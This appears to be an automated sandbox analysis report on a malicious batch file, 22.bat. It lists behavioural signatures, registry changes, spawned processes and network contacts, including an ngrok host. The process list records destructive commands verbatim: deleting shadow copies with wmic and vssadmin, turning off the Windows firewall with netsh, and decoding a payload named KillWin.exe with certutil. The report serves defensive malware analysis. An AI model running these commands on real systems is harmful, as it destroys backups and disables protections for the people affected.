Analysis Overview
SHA256
8254c19785e9b98091dc3644126e1b41188cba52549b2cdd5a84c4d4beb8c4f8
Threat Level: Likely malicious
The file 22.bat was found to be: Likely malicious.
Malicious Activity Summary
Deletes shadow copies
Modifies Windows Firewall
Sets file to hidden
Checks computer location settings
Enumerates connected drives
Sets desktop wallpaper using registry
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Gathers network information
Interacts with shadow copies
Modifies Control Panel
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 08:19
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 08:19
Reported
2024-06-26 08:22
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
152s
Command Line
Signatures
Deletes shadow copies
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\E: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5000310000000000a858ce6d10004c6f63616c003c0009000400efbea8582761da5883422e00000096e10100000001000000000000000000000000000000e58d7f004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000a85827611100557365727300640009000400efbe874f7748da5883422e000000c70500000000010000000000000000003a0000000000eff5be0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000a858276112004170704461746100400009000400efbea8582761da5883422e00000083e10100000001000000000000000000000000000000db45ae004100700070004400610074006100000016000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000da588342100054656d7000003a0009000400efbea8582761da5883422e00000097e1010000000100000000000000000000000000000041905a00540065006d007000000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000a858a66d100041646d696e003c0009000400efbea8582761da5883422e00000078e10100000001000000000000000000000000000000700c0d00410064006d0069006e00000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\22.bat"
C:\Windows\system32\attrib.exe
attrib Admin-information.log +h
C:\Windows\explorer.exe
explorer .
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all/quiet
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://ca82-152-231-188-225.ngrok-free.app/Kit
C:\Windows\system32\mode.com
mode con: cols=170 lines=45
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4368,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4784,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5284,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5436,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5444,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
C:\Windows\system32\certutil.exe
certutil -decode "Image.bin" "Wallpaper.jpeg"
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5980,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:1
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\system32\timeout.exe
timeout /t 4
C:\Windows\system32\certutil.exe
certutil -decode "Data.lp" "KillWin.exe"
C:\Windows\system32\wscript.exe
wscript "m.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5688,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6564,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6524,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x470 0x49c
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | ca82-152-231-188-225.ngrok-free.app | udp |
| US | 8.8.8.8:53 | ca82-152-231-188-225.ngrok-free.app | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | ca82-152-231-188-225.ngrok-free.app | udp |
| DE | 18.192.31.165:443 | ca82-152-231-188-225.ngrok-free.app | tcp |
| DE | 18.192.31.165:443 | ca82-152-231-188-225.ngrok-free.app | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | cdn.ngrok.com | udp |
| US | 8.8.8.8:53 | cdn.ngrok.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| US | 23.200.189.225:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 2.20.12.101:443 | bzib.nelreports.net | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.31.192.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.102.125.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.189.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
